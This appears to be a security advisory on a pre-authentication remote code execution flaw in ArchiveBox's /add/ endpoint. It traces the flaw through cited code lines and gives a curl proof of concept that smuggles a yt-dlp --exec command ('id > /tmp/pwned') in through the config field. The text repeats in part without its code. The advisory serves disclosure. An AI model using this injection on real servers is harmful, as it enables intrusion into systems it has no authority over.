The /add/ endpoint (AddView in core/views.py) accepts a config JSON field that gets merged into the crawl config without validation. This config is exported as environment variables when archive plugins run, allowing injection of arbitrary tool arguments to achieve RCE.
When PUBLIC_ADD_VIEW=True (common for bookmarklet usage), this is exploitable without authentication. The endpoint is also @csrf_exempt.
Affected code:
core/views.py:887 - user config extracted with no validation:
custom_config = form.cleaned_data.get("config") or {}
core/views.py:918 - merged into crawl config:
config.update(custom_config)
config/configset.py:255-256 - crawl config applied with high priority:
if crawl and hasattr(crawl, "config") and crawl.config:
config.update(crawl.config)
hooks.py:398-411 - config exported as env vars:
for key, value in config.items():
if key in SKIP_KEYS: continue
env[key] = str(value)
plugins/ytdlp/on_Snapshot__02_ytdlp.bg.py:122-123 - env var args passed to yt-dlp:
ytdlp_args_extra = get_env_array("YTDLP_ARGS_EXTRA", [])
cmd.extend(ytdlp_args_extra)
PoC (pre-auth when PUBLIC_ADD_VIEW=True):
curl -X POST http://localhost:8000/add/ \
-d "url=https://www.youtube.com/watch?v=dQw4w9WgXcQ" \
-d "depth=0" \
-d "config={\"YTDLP_ARGS_EXTRA\": \"[\\\"--exec\\\", \\\"id > /tmp/pwned\\\"]\"}"
After the crawl runs, yt-dlp executes id > /tmp/pwned via its --exec flag.
Same approach works with GALLERYDL_ARGS_EXTRA (gallery-dl --exec), or overriding any *_BINARY key.
Impact: Remote code execution on the ArchiveBox server. Pre-auth when PUBLIC_ADD_VIEW=True.
References
The /add/ endpoint (AddView in core/views.py) accepts a config JSON field that gets merged into the crawl config without validation. This config is exported as environment variables when archive plugins run, allowing injection of arbitrary tool arguments to achieve RCE.
When PUBLIC_ADD_VIEW=True (common for bookmarklet usage), this is exploitable without authentication. The endpoint is also @csrf_exempt.
Affected code:
core/views.py:887 - user config extracted with no validation:
core/views.py:918 - merged into crawl config:
config/configset.py:255-256 - crawl config applied with high priority:
hooks.py:398-411 - config exported as env vars:
plugins/ytdlp/on_Snapshot__02_ytdlp.bg.py:122-123 - env var args passed to yt-dlp:
PoC (pre-auth when PUBLIC_ADD_VIEW=True):
After the crawl runs, yt-dlp executes id > /tmp/pwned via its --exec flag.
Same approach works with GALLERYDL_ARGS_EXTRA (gallery-dl --exec), or overriding any *_BINARY key.
Impact: Remote code execution on the ArchiveBox server. Pre-auth when PUBLIC_ADD_VIEW=True.
References